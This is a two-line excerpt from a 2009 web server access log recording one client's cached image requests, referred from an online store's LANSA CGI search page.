204.208.240.55 - - [04/Sep/2009:04:30:05 -0400] "GET /images/blend.jpg HTTP/1.0" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):0034020" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
204.208.240.55 - - [04/Sep/2009:04:30:05 -0400] "GET /images/pf-a.gif HTTP/1.0" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):S+QSRKEY(A0300):0034020" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
